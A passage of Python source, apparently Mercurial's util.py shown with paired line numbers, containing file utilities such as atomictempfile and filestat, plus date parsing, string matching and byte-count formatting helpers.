1474 1471 fd = None
1475 1472 try:
1476 1473 oslink(f1, f2)
1477 1474 # nlinks() may behave differently for files on Windows shares if
1478 1475 # the file is open.
1479 1476 fd = posixfile(f2)
1480 1477 return nlinks(f2) > 1
1481 1478 except OSError:
1482 1479 return False
1483 1480 finally:
1484 1481 if fd is not None:
1485 1482 fd.close()
1486 1483 for f in (f1, f2):
1487 1484 try:
1488 1485 os.unlink(f)
1489 1486 except OSError:
1490 1487 pass
1491 1488
1492 1489 def endswithsep(path):
1493 1490 '''Check path ends with os.sep or os.altsep.'''
1494 1491 return (path.endswith(pycompat.ossep)
1495 1492 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1496 1493
1497 1494 def splitpath(path):
1498 1495 '''Split path by os.sep.
1499 1496 Note that this function does not use os.altsep because this is
1500 1497 an alternative of simple "xxx.split(os.sep)".
1501 1498 It is recommended to use os.path.normpath() before using this
1502 1499 function if need.'''
1503 1500 return path.split(pycompat.ossep)
1504 1501
1505 1502 def gui():
1506 1503 '''Are we running in a GUI?'''
1507 1504 if pycompat.sysplatform == 'darwin':
1508 1505 if 'SSH_CONNECTION' in encoding.environ:
1509 1506 # handle SSH access to a box where the user is logged in
1510 1507 return False
1511 1508 elif getattr(osutil, 'isgui', None):
1512 1509 # check if a CoreGraphics session is available
1513 1510 return osutil.isgui()
1514 1511 else:
1515 1512 # pure build; use a safe default
1516 1513 return True
1517 1514 else:
1518 1515 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1519 1516
1520 1517 def mktempcopy(name, emptyok=False, createmode=None):
1521 1518 """Create a temporary file with the same contents from name
1522 1519
1523 1520 The permission bits are copied from the original file.
1524 1521
1525 1522 If the temporary file is going to be truncated immediately, you
1526 1523 can use emptyok=True as an optimization.
1527 1524
1528 1525 Returns the name of the temporary file.
1529 1526 """
1530 1527 d, fn = os.path.split(name)
1531 1528 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1532 1529 os.close(fd)
1533 1530 # Temporary files are created with mode 0600, which is usually not
1534 1531 # what we want. If the original file already exists, just copy
1535 1532 # its mode. Otherwise, manually obey umask.
1536 1533 copymode(name, temp, createmode)
1537 1534 if emptyok:
1538 1535 return temp
1539 1536 try:
1540 1537 try:
1541 1538 ifp = posixfile(name, "rb")
1542 1539 except IOError as inst:
1543 1540 if inst.errno == errno.ENOENT:
1544 1541 return temp
1545 1542 if not getattr(inst, 'filename', None):
1546 1543 inst.filename = name
1547 1544 raise
1548 1545 ofp = posixfile(temp, "wb")
1549 1546 for chunk in filechunkiter(ifp):
1550 1547 ofp.write(chunk)
1551 1548 ifp.close()
1552 1549 ofp.close()
1553 1550 except: # re-raises
1554 1551 try: os.unlink(temp)
1555 1552 except OSError: pass
1556 1553 raise
1557 1554 return temp
1558 1555
1559 1556 class filestat(object):
1560 1557 """help to exactly detect change of a file
1561 1558
1562 1559 'stat' attribute is result of 'os.stat()' if specified 'path'
1563 1560 exists. Otherwise, it is None. This can avoid preparative
1564 1561 'exists()' examination on client side of this class.
1565 1562 """
1566 1563 def __init__(self, stat):
1567 1564 self.stat = stat
1568 1565
1569 1566 @classmethod
1570 1567 def frompath(cls, path):
1571 1568 try:
1572 1569 stat = os.stat(path)
1573 1570 except OSError as err:
1574 1571 if err.errno != errno.ENOENT:
1575 1572 raise
1576 1573 stat = None
1577 1574 return cls(stat)
1578 1575
1579 1576 @classmethod
1580 1577 def fromfp(cls, fp):
1581 1578 stat = os.fstat(fp.fileno())
1582 1579 return cls(stat)
1583 1580
1584 1581 __hash__ = object.__hash__
1585 1582
1586 1583 def __eq__(self, old):
1587 1584 try:
1588 1585 # if ambiguity between stat of new and old file is
1589 1586 # avoided, comparison of size, ctime and mtime is enough
1590 1587 # to exactly detect change of a file regardless of platform
1591 1588 return (self.stat.st_size == old.stat.st_size and
1592 1589 self.stat.st_ctime == old.stat.st_ctime and
1593 1590 self.stat.st_mtime == old.stat.st_mtime)
1594 1591 except AttributeError:
1595 1592 pass
1596 1593 try:
1597 1594 return self.stat is None and old.stat is None
1598 1595 except AttributeError:
1599 1596 return False
1600 1597
1601 1598 def isambig(self, old):
1602 1599 """Examine whether new (= self) stat is ambiguous against old one
1603 1600
1604 1601 "S[N]" below means stat of a file at N-th change:
1605 1602
1606 1603 - S[n-1].ctime < S[n].ctime: can detect change of a file
1607 1604 - S[n-1].ctime == S[n].ctime
1608 1605 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1609 1606 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1610 1607 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1611 1608 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1612 1609
1613 1610 Case (*2) above means that a file was changed twice or more at
1614 1611 same time in sec (= S[n-1].ctime), and comparison of timestamp
1615 1612 is ambiguous.
1616 1613
1617 1614 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1618 1615 timestamp is ambiguous".
1619 1616
1620 1617 But advancing mtime only in case (*2) doesn't work as
1621 1618 expected, because naturally advanced S[n].mtime in case (*1)
1622 1619 might be equal to manually advanced S[n-1 or earlier].mtime.
1623 1620
1624 1621 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1625 1622 treated as ambiguous regardless of mtime, to avoid overlooking
1626 1623 by confliction between such mtime.
1627 1624
1628 1625 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1629 1626 S[n].mtime", even if size of a file isn't changed.
1630 1627 """
1631 1628 try:
1632 1629 return (self.stat.st_ctime == old.stat.st_ctime)
1633 1630 except AttributeError:
1634 1631 return False
1635 1632
1636 1633 def avoidambig(self, path, old):
1637 1634 """Change file stat of specified path to avoid ambiguity
1638 1635
1639 1636 'old' should be previous filestat of 'path'.
1640 1637
1641 1638 This skips avoiding ambiguity, if a process doesn't have
1642 1639 appropriate privileges for 'path'. This returns False in this
1643 1640 case.
1644 1641
1645 1642 Otherwise, this returns True, as "ambiguity is avoided".
1646 1643 """
1647 1644 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1648 1645 try:
1649 1646 os.utime(path, (advanced, advanced))
1650 1647 except OSError as inst:
1651 1648 if inst.errno == errno.EPERM:
1652 1649 # utime() on the file created by another user causes EPERM,
1653 1650 # if a process doesn't have appropriate privileges
1654 1651 return False
1655 1652 raise
1656 1653 return True
1657 1654
1658 1655 def __ne__(self, other):
1659 1656 return not self == other
1660 1657
1661 1658 class atomictempfile(object):
1662 1659 '''writable file object that atomically updates a file
1663 1660
1664 1661 All writes will go to a temporary copy of the original file. Call
1665 1662 close() when you are done writing, and atomictempfile will rename
1666 1663 the temporary copy to the original name, making the changes
1667 1664 visible. If the object is destroyed without being closed, all your
1668 1665 writes are discarded.
1669 1666
1670 1667 checkambig argument of constructor is used with filestat, and is
1671 1668 useful only if target file is guarded by any lock (e.g. repo.lock
1672 1669 or repo.wlock).
1673 1670 '''
1674 1671 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1675 1672 self.__name = name # permanent name
1676 1673 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1677 1674 createmode=createmode)
1678 1675 self._fp = posixfile(self._tempname, mode)
1679 1676 self._checkambig = checkambig
1680 1677
1681 1678 # delegated methods
1682 1679 self.read = self._fp.read
1683 1680 self.write = self._fp.write
1684 1681 self.seek = self._fp.seek
1685 1682 self.tell = self._fp.tell
1686 1683 self.fileno = self._fp.fileno
1687 1684
1688 1685 def close(self):
1689 1686 if not self._fp.closed:
1690 1687 self._fp.close()
1691 1688 filename = localpath(self.__name)
1692 1689 oldstat = self._checkambig and filestat.frompath(filename)
1693 1690 if oldstat and oldstat.stat:
1694 1691 rename(self._tempname, filename)
1695 1692 newstat = filestat.frompath(filename)
1696 1693 if newstat.isambig(oldstat):
1697 1694 # stat of changed file is ambiguous to original one
1698 1695 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1699 1696 os.utime(filename, (advanced, advanced))
1700 1697 else:
1701 1698 rename(self._tempname, filename)
1702 1699
1703 1700 def discard(self):
1704 1701 if not self._fp.closed:
1705 1702 try:
1706 1703 os.unlink(self._tempname)
1707 1704 except OSError:
1708 1705 pass
1709 1706 self._fp.close()
1710 1707
1711 1708 def __del__(self):
1712 1709 if safehasattr(self, '_fp'): # constructor actually did something
1713 1710 self.discard()
1714 1711
1715 1712 def __enter__(self):
1716 1713 return self
1717 1714
1718 1715 def __exit__(self, exctype, excvalue, traceback):
1719 1716 if exctype is not None:
1720 1717 self.discard()
1721 1718 else:
1722 1719 self.close()
1723 1720
1724 1721 def unlinkpath(f, ignoremissing=False):
1725 1722 """unlink and remove the directory if it is empty"""
1726 1723 if ignoremissing:
1727 1724 tryunlink(f)
1728 1725 else:
1729 1726 unlink(f)
1730 1727 # try removing directories that might now be empty
1731 1728 try:
1732 1729 removedirs(os.path.dirname(f))
1733 1730 except OSError:
1734 1731 pass
1735 1732
1736 1733 def tryunlink(f):
1737 1734 """Attempt to remove a file, ignoring ENOENT errors."""
1738 1735 try:
1739 1736 unlink(f)
1740 1737 except OSError as e:
1741 1738 if e.errno != errno.ENOENT:
1742 1739 raise
1743 1740
1744 1741 def makedirs(name, mode=None, notindexed=False):
1745 1742 """recursive directory creation with parent mode inheritance
1746 1743
1747 1744 Newly created directories are marked as "not to be indexed by
1748 1745 the content indexing service", if ``notindexed`` is specified
1749 1746 for "write" mode access.
1750 1747 """
1751 1748 try:
1752 1749 makedir(name, notindexed)
1753 1750 except OSError as err:
1754 1751 if err.errno == errno.EEXIST:
1755 1752 return
1756 1753 if err.errno != errno.ENOENT or not name:
1757 1754 raise
1758 1755 parent = os.path.dirname(os.path.abspath(name))
1759 1756 if parent == name:
1760 1757 raise
1761 1758 makedirs(parent, mode, notindexed)
1762 1759 try:
1763 1760 makedir(name, notindexed)
1764 1761 except OSError as err:
1765 1762 # Catch EEXIST to handle races
1766 1763 if err.errno == errno.EEXIST:
1767 1764 return
1768 1765 raise
1769 1766 if mode is not None:
1770 1767 os.chmod(name, mode)
1771 1768
1772 1769 def readfile(path):
1773 1770 with open(path, 'rb') as fp:
1774 1771 return fp.read()
1775 1772
1776 1773 def writefile(path, text):
1777 1774 with open(path, 'wb') as fp:
1778 1775 fp.write(text)
1779 1776
1780 1777 def appendfile(path, text):
1781 1778 with open(path, 'ab') as fp:
1782 1779 fp.write(text)
1783 1780
1784 1781 class chunkbuffer(object):
1785 1782 """Allow arbitrary sized chunks of data to be efficiently read from an
1786 1783 iterator over chunks of arbitrary size."""
1787 1784
1788 1785 def __init__(self, in_iter):
1789 1786 """in_iter is the iterator that's iterating over the input chunks."""
1790 1787 def splitbig(chunks):
1791 1788 for chunk in chunks:
1792 1789 if len(chunk) > 2**20:
1793 1790 pos = 0
1794 1791 while pos < len(chunk):
1795 1792 end = pos + 2 ** 18
1796 1793 yield chunk[pos:end]
1797 1794 pos = end
1798 1795 else:
1799 1796 yield chunk
1800 1797 self.iter = splitbig(in_iter)
1801 1798 self._queue = collections.deque()
1802 1799 self._chunkoffset = 0
1803 1800
1804 1801 def read(self, l=None):
1805 1802 """Read L bytes of data from the iterator of chunks of data.
1806 1803 Returns less than L bytes if the iterator runs dry.
1807 1804
1808 1805 If size parameter is omitted, read everything"""
1809 1806 if l is None:
1810 1807 return ''.join(self.iter)
1811 1808
1812 1809 left = l
1813 1810 buf = []
1814 1811 queue = self._queue
1815 1812 while left > 0:
1816 1813 # refill the queue
1817 1814 if not queue:
1818 1815 target = 2**18
1819 1816 for chunk in self.iter:
1820 1817 queue.append(chunk)
1821 1818 target -= len(chunk)
1822 1819 if target <= 0:
1823 1820 break
1824 1821 if not queue:
1825 1822 break
1826 1823
1827 1824 # The easy way to do this would be to queue.popleft(), modify the
1828 1825 # chunk (if necessary), then queue.appendleft(). However, for cases
1829 1826 # where we read partial chunk content, this incurs 2 dequeue
1830 1827 # mutations and creates a new str for the remaining chunk in the
1831 1828 # queue. Our code below avoids this overhead.
1832 1829
1833 1830 chunk = queue[0]
1834 1831 chunkl = len(chunk)
1835 1832 offset = self._chunkoffset
1836 1833
1837 1834 # Use full chunk.
1838 1835 if offset == 0 and left >= chunkl:
1839 1836 left -= chunkl
1840 1837 queue.popleft()
1841 1838 buf.append(chunk)
1842 1839 # self._chunkoffset remains at 0.
1843 1840 continue
1844 1841
1845 1842 chunkremaining = chunkl - offset
1846 1843
1847 1844 # Use all of unconsumed part of chunk.
1848 1845 if left >= chunkremaining:
1849 1846 left -= chunkremaining
1850 1847 queue.popleft()
1851 1848 # offset == 0 is enabled by block above, so this won't merely
1852 1849 # copy via ``chunk[0:]``.
1853 1850 buf.append(chunk[offset:])
1854 1851 self._chunkoffset = 0
1855 1852
1856 1853 # Partial chunk needed.
1857 1854 else:
1858 1855 buf.append(chunk[offset:offset + left])
1859 1856 self._chunkoffset += left
1860 1857 left -= chunkremaining
1861 1858
1862 1859 return ''.join(buf)
1863 1860
1864 1861 def filechunkiter(f, size=131072, limit=None):
1865 1862 """Create a generator that produces the data in the file size
1866 1863 (default 131072) bytes at a time, up to optional limit (default is
1867 1864 to read all data). Chunks may be less than size bytes if the
1868 1865 chunk is the last chunk in the file, or the file is a socket or
1869 1866 some other type of file that sometimes reads less data than is
1870 1867 requested."""
1871 1868 assert size >= 0
1872 1869 assert limit is None or limit >= 0
1873 1870 while True:
1874 1871 if limit is None:
1875 1872 nbytes = size
1876 1873 else:
1877 1874 nbytes = min(limit, size)
1878 1875 s = nbytes and f.read(nbytes)
1879 1876 if not s:
1880 1877 break
1881 1878 if limit:
1882 1879 limit -= len(s)
1883 1880 yield s
1884 1881
1885 1882 def makedate(timestamp=None):
1886 1883 '''Return a unix timestamp (or the current time) as a (unixtime,
1887 1884 offset) tuple based off the local timezone.'''
1888 1885 if timestamp is None:
1889 1886 timestamp = time.time()
1890 1887 if timestamp < 0:
1891 1888 hint = _("check your clock")
1892 1889 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1893 1890 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1894 1891 datetime.datetime.fromtimestamp(timestamp))
1895 1892 tz = delta.days * 86400 + delta.seconds
1896 1893 return timestamp, tz
1897 1894
1898 1895 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1899 1896 """represent a (unixtime, offset) tuple as a localized time.
1900 1897 unixtime is seconds since the epoch, and offset is the time zone's
1901 1898 number of seconds away from UTC.
1902 1899
1903 1900 >>> datestr((0, 0))
1904 1901 'Thu Jan 01 00:00:00 1970 +0000'
1905 1902 >>> datestr((42, 0))
1906 1903 'Thu Jan 01 00:00:42 1970 +0000'
1907 1904 >>> datestr((-42, 0))
1908 1905 'Wed Dec 31 23:59:18 1969 +0000'
1909 1906 >>> datestr((0x7fffffff, 0))
1910 1907 'Tue Jan 19 03:14:07 2038 +0000'
1911 1908 >>> datestr((-0x80000000, 0))
1912 1909 'Fri Dec 13 20:45:52 1901 +0000'
1913 1910 """
1914 1911 t, tz = date or makedate()
1915 1912 if "%1" in format or "%2" in format or "%z" in format:
1916 1913 sign = (tz > 0) and "-" or "+"
1917 1914 minutes = abs(tz) // 60
1918 1915 q, r = divmod(minutes, 60)
1919 1916 format = format.replace("%z", "%1%2")
1920 1917 format = format.replace("%1", "%c%02d" % (sign, q))
1921 1918 format = format.replace("%2", "%02d" % r)
1922 1919 d = t - tz
1923 1920 if d > 0x7fffffff:
1924 1921 d = 0x7fffffff
1925 1922 elif d < -0x80000000:
1926 1923 d = -0x80000000
1927 1924 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1928 1925 # because they use the gmtime() system call which is buggy on Windows
1929 1926 # for negative values.
1930 1927 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1931 1928 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1932 1929 return s
1933 1930
1934 1931 def shortdate(date=None):
1935 1932 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1936 1933 return datestr(date, format='%Y-%m-%d')
1937 1934
1938 1935 def parsetimezone(s):
1939 1936 """find a trailing timezone, if any, in string, and return a
1940 1937 (offset, remainder) pair"""
1941 1938
1942 1939 if s.endswith("GMT") or s.endswith("UTC"):
1943 1940 return 0, s[:-3].rstrip()
1944 1941
1945 1942 # Unix-style timezones [+-]hhmm
1946 1943 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1947 1944 sign = (s[-5] == "+") and 1 or -1
1948 1945 hours = int(s[-4:-2])
1949 1946 minutes = int(s[-2:])
1950 1947 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1951 1948
1952 1949 # ISO8601 trailing Z
1953 1950 if s.endswith("Z") and s[-2:-1].isdigit():
1954 1951 return 0, s[:-1]
1955 1952
1956 1953 # ISO8601-style [+-]hh:mm
1957 1954 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1958 1955 s[-5:-3].isdigit() and s[-2:].isdigit()):
1959 1956 sign = (s[-6] == "+") and 1 or -1
1960 1957 hours = int(s[-5:-3])
1961 1958 minutes = int(s[-2:])
1962 1959 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1963 1960
1964 1961 return None, s
1965 1962
1966 1963 def strdate(string, format, defaults=None):
1967 1964 """parse a localized time string and return a (unixtime, offset) tuple.
1968 1965 if the string cannot be parsed, ValueError is raised."""
1969 1966 if defaults is None:
1970 1967 defaults = {}
1971 1968
1972 1969 # NOTE: unixtime = localunixtime + offset
1973 1970 offset, date = parsetimezone(string)
1974 1971
1975 1972 # add missing elements from defaults
1976 1973 usenow = False # default to using biased defaults
1977 1974 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1978 1975 part = pycompat.bytestr(part)
1979 1976 found = [True for p in part if ("%"+p) in format]
1980 1977 if not found:
1981 1978 date += "@" + defaults[part][usenow]
1982 1979 format += "@%" + part[0]
1983 1980 else:
1984 1981 # We've found a specific time element, less specific time
1985 1982 # elements are relative to today
1986 1983 usenow = True
1987 1984
1988 1985 timetuple = time.strptime(encoding.strfromlocal(date),
1989 1986 encoding.strfromlocal(format))
1990 1987 localunixtime = int(calendar.timegm(timetuple))
1991 1988 if offset is None:
1992 1989 # local timezone
1993 1990 unixtime = int(time.mktime(timetuple))
1994 1991 offset = unixtime - localunixtime
1995 1992 else:
1996 1993 unixtime = localunixtime + offset
1997 1994 return unixtime, offset
1998 1995
1999 1996 def parsedate(date, formats=None, bias=None):
2000 1997 """parse a localized date/time and return a (unixtime, offset) tuple.
2001 1998
2002 1999 The date may be a "unixtime offset" string or in one of the specified
2003 2000 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2004 2001
2005 2002 >>> parsedate(' today ') == parsedate(\
2006 2003 datetime.date.today().strftime('%b %d'))
2007 2004 True
2008 2005 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2009 2006 datetime.timedelta(days=1)\
2010 2007 ).strftime('%b %d'))
2011 2008 True
2012 2009 >>> now, tz = makedate()
2013 2010 >>> strnow, strtz = parsedate('now')
2014 2011 >>> (strnow - now) < 1
2015 2012 True
2016 2013 >>> tz == strtz
2017 2014 True
2018 2015 """
2019 2016 if bias is None:
2020 2017 bias = {}
2021 2018 if not date:
2022 2019 return 0, 0
2023 2020 if isinstance(date, tuple) and len(date) == 2:
2024 2021 return date
2025 2022 if not formats:
2026 2023 formats = defaultdateformats
2027 2024 date = date.strip()
2028 2025
2029 2026 if date == 'now' or date == _('now'):
2030 2027 return makedate()
2031 2028 if date == 'today' or date == _('today'):
2032 2029 date = datetime.date.today().strftime('%b %d')
2033 2030 elif date == 'yesterday' or date == _('yesterday'):
2034 2031 date = (datetime.date.today() -
2035 2032 datetime.timedelta(days=1)).strftime('%b %d')
2036 2033
2037 2034 try:
2038 2035 when, offset = map(int, date.split(' '))
2039 2036 except ValueError:
2040 2037 # fill out defaults
2041 2038 now = makedate()
2042 2039 defaults = {}
2043 2040 for part in ("d", "mb", "yY", "HI", "M", "S"):
2044 2041 # this piece is for rounding the specific end of unknowns
2045 2042 b = bias.get(part)
2046 2043 if b is None:
2047 2044 if part[0:1] in "HMS":
2048 2045 b = "00"
2049 2046 else:
2050 2047 b = "0"
2051 2048
2052 2049 # this piece is for matching the generic end to today's date
2053 2050 n = datestr(now, "%" + part[0:1])
2054 2051
2055 2052 defaults[part] = (b, n)
2056 2053
2057 2054 for format in formats:
2058 2055 try:
2059 2056 when, offset = strdate(date, format, defaults)
2060 2057 except (ValueError, OverflowError):
2061 2058 pass
2062 2059 else:
2063 2060 break
2064 2061 else:
2065 2062 raise error.ParseError(_('invalid date: %r') % date)
2066 2063 # validate explicit (probably user-specified) date and
2067 2064 # time zone offset. values must fit in signed 32 bits for
2068 2065 # current 32-bit linux runtimes. timezones go from UTC-12
2069 2066 # to UTC+14
2070 2067 if when < -0x80000000 or when > 0x7fffffff:
2071 2068 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2072 2069 if offset < -50400 or offset > 43200:
2073 2070 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2074 2071 return when, offset
2075 2072
2076 2073 def matchdate(date):
2077 2074 """Return a function that matches a given date match specifier
2078 2075
2079 2076 Formats include:
2080 2077
2081 2078 '{date}' match a given date to the accuracy provided
2082 2079
2083 2080 '<{date}' on or before a given date
2084 2081
2085 2082 '>{date}' on or after a given date
2086 2083
2087 2084 >>> p1 = parsedate("10:29:59")
2088 2085 >>> p2 = parsedate("10:30:00")
2089 2086 >>> p3 = parsedate("10:30:59")
2090 2087 >>> p4 = parsedate("10:31:00")
2091 2088 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2092 2089 >>> f = matchdate("10:30")
2093 2090 >>> f(p1[0])
2094 2091 False
2095 2092 >>> f(p2[0])
2096 2093 True
2097 2094 >>> f(p3[0])
2098 2095 True
2099 2096 >>> f(p4[0])
2100 2097 False
2101 2098 >>> f(p5[0])
2102 2099 False
2103 2100 """
2104 2101
2105 2102 def lower(date):
2106 2103 d = {'mb': "1", 'd': "1"}
2107 2104 return parsedate(date, extendeddateformats, d)[0]
2108 2105
2109 2106 def upper(date):
2110 2107 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2111 2108 for days in ("31", "30", "29"):
2112 2109 try:
2113 2110 d["d"] = days
2114 2111 return parsedate(date, extendeddateformats, d)[0]
2115 2112 except Abort:
2116 2113 pass
2117 2114 d["d"] = "28"
2118 2115 return parsedate(date, extendeddateformats, d)[0]
2119 2116
2120 2117 date = date.strip()
2121 2118
2122 2119 if not date:
2123 2120 raise Abort(_("dates cannot consist entirely of whitespace"))
2124 2121 elif date[0] == "<":
2125 2122 if not date[1:]:
2126 2123 raise Abort(_("invalid day spec, use '<DATE'"))
2127 2124 when = upper(date[1:])
2128 2125 return lambda x: x <= when
2129 2126 elif date[0] == ">":
2130 2127 if not date[1:]:
2131 2128 raise Abort(_("invalid day spec, use '>DATE'"))
2132 2129 when = lower(date[1:])
2133 2130 return lambda x: x >= when
2134 2131 elif date[0] == "-":
2135 2132 try:
2136 2133 days = int(date[1:])
2137 2134 except ValueError:
2138 2135 raise Abort(_("invalid day spec: %s") % date[1:])
2139 2136 if days < 0:
2140 2137 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2141 2138 % date[1:])
2142 2139 when = makedate()[0] - days * 3600 * 24
2143 2140 return lambda x: x >= when
2144 2141 elif " to " in date:
2145 2142 a, b = date.split(" to ")
2146 2143 start, stop = lower(a), upper(b)
2147 2144 return lambda x: x >= start and x <= stop
2148 2145 else:
2149 2146 start, stop = lower(date), upper(date)
2150 2147 return lambda x: x >= start and x <= stop
2151 2148
2152 2149 def stringmatcher(pattern, casesensitive=True):
2153 2150 """
2154 2151 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2155 2152 returns the matcher name, pattern, and matcher function.
2156 2153 missing or unknown prefixes are treated as literal matches.
2157 2154
2158 2155 helper for tests:
2159 2156 >>> def test(pattern, *tests):
2160 2157 ... kind, pattern, matcher = stringmatcher(pattern)
2161 2158 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2162 2159 >>> def itest(pattern, *tests):
2163 2160 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2164 2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2165 2162
2166 2163 exact matching (no prefix):
2167 2164 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2168 2165 ('literal', 'abcdefg', [False, False, True])
2169 2166
2170 2167 regex matching ('re:' prefix)
2171 2168 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2172 2169 ('re', 'a.+b', [False, False, True])
2173 2170
2174 2171 force exact matches ('literal:' prefix)
2175 2172 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2176 2173 ('literal', 're:foobar', [False, True])
2177 2174
2178 2175 unknown prefixes are ignored and treated as literals
2179 2176 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2180 2177 ('literal', 'foo:bar', [False, False, True])
2181 2178
2182 2179 case insensitive regex matches
2183 2180 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2184 2181 ('re', 'A.+b', [False, False, True])
2185 2182
2186 2183 case insensitive literal matches
2187 2184 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2188 2185 ('literal', 'ABCDEFG', [False, False, True])
2189 2186 """
2190 2187 if pattern.startswith('re:'):
2191 2188 pattern = pattern[3:]
2192 2189 try:
2193 2190 flags = 0
2194 2191 if not casesensitive:
2195 2192 flags = remod.I
2196 2193 regex = remod.compile(pattern, flags)
2197 2194 except remod.error as e:
2198 2195 raise error.ParseError(_('invalid regular expression: %s')
2199 2196 % e)
2200 2197 return 're', pattern, regex.search
2201 2198 elif pattern.startswith('literal:'):
2202 2199 pattern = pattern[8:]
2203 2200
2204 2201 match = pattern.__eq__
2205 2202
2206 2203 if not casesensitive:
2207 2204 ipat = encoding.lower(pattern)
2208 2205 match = lambda s: ipat == encoding.lower(s)
2209 2206 return 'literal', pattern, match
2210 2207
2211 2208 def shortuser(user):
2212 2209 """Return a short representation of a user name or email address."""
2213 2210 f = user.find('@')
2214 2211 if f >= 0:
2215 2212 user = user[:f]
2216 2213 f = user.find('<')
2217 2214 if f >= 0:
2218 2215 user = user[f + 1:]
2219 2216 f = user.find(' ')
2220 2217 if f >= 0:
2221 2218 user = user[:f]
2222 2219 f = user.find('.')
2223 2220 if f >= 0:
2224 2221 user = user[:f]
2225 2222 return user
2226 2223
2227 2224 def emailuser(user):
2228 2225 """Return the user portion of an email address."""
2229 2226 f = user.find('@')
2230 2227 if f >= 0:
2231 2228 user = user[:f]
2232 2229 f = user.find('<')
2233 2230 if f >= 0:
2234 2231 user = user[f + 1:]
2235 2232 return user
2236 2233
2237 2234 def email(author):
2238 2235 '''get email of author.'''
2239 2236 r = author.find('>')
2240 2237 if r == -1:
2241 2238 r = None
2242 2239 return author[author.find('<') + 1:r]
2243 2240
2244 2241 def ellipsis(text, maxlength=400):
2245 2242 """Trim string to at most maxlength (default: 400) columns in display."""
2246 2243 return encoding.trim(text, maxlength, ellipsis='...')
2247 2244
2248 2245 def unitcountfn(*unittable):
2249 2246 '''return a function that renders a readable count of some quantity'''
2250 2247
2251 2248 def go(count):
2252 2249 for multiplier, divisor, format in unittable:
2253 2250 if abs(count) >= divisor * multiplier:
2254 2251 return format % (count / float(divisor))
2255 2252 return unittable[-1][2] % count
2256 2253
2257 2254 return go
2258 2255
2259 2256 def processlinerange(fromline, toline):
2260 2257 """Check that linerange <fromline>:<toline> makes sense and return a
2261 2258 0-based range.
2262 2259
2263 2260 >>> processlinerange(10, 20)
2264 2261 (9, 20)
2265 2262 >>> processlinerange(2, 1)
2266 2263 Traceback (most recent call last):
2267 2264 ...
2268 2265 ParseError: line range must be positive
2269 2266 >>> processlinerange(0, 5)
2270 2267 Traceback (most recent call last):
2271 2268 ...
2272 2269 ParseError: fromline must be strictly positive
2273 2270 """
2274 2271 if toline - fromline < 0:
2275 2272 raise error.ParseError(_("line range must be positive"))
2276 2273 if fromline < 1:
2277 2274 raise error.ParseError(_("fromline must be strictly positive"))
2278 2275 return fromline - 1, toline
2279 2276
2280 2277 bytecount = unitcountfn(
2281 2278 (100, 1 << 30, _('%.0f GB')),
2282 2279 (10, 1 << 30, _('%.1f GB')),
2283 2280 (1, 1 << 30, _('%.2f GB')),
2284 2281 (100, 1 << 20, _('%.0f MB')),
2285 2282 (10, 1 << 20, _('%.1f MB')),
2286 2283 (1, 1 << 20, _('%.2f MB')),
2287 2284 (100, 1 << 10, _('%.0f KB')),
2288 2285 (10, 1 << 10, _('%.1f KB')),
2289 2286 (1, 1 << 10, _('%.2f KB')),
2290 2287 (1, 1, _('%.0f bytes')),
2291 2288 )
2292 2289
2293 2290 # Matches a single EOL which can either be a CRLF where repeated CR
2294 2291 # are removed or a LF. We do not care about old Macintosh files, so a
2295 2292 # stray CR is an error.
2296 2293 _eolre = remod.compile(br'\r*\n')
2297 2294
2298 2295 def tolf(s):
2299 2296 return _eolre.sub('\n', s)
2300 2297
2301 2298 def tocrlf(s):
2302 2299 return _eolre.sub('\r\n', s)
2303 2300
2304 2301 if pycompat.oslinesep == '\r\n':
2305 2302 tonativeeol = tocrlf
2306 2303 fromnativeeol = tolf
2307 2304 else:
2308 2305 tonativeeol = pycompat.identity
2309 2306 fromnativeeol = pycompat.identity
2310 2307
2311 2308 def escapestr(s):
2312 2309 # call underlying function of s.encode('string_escape') directly for
2313 2310 # Python 3 compatibility
2314 2311 return codecs.escape_encode(s)[0]
2315 2312
2316 2313 def unescapestr(s):
2317 2314 return codecs.escape_decode(s)[0]
2318 2315
2319 2316 def forcebytestr(obj):
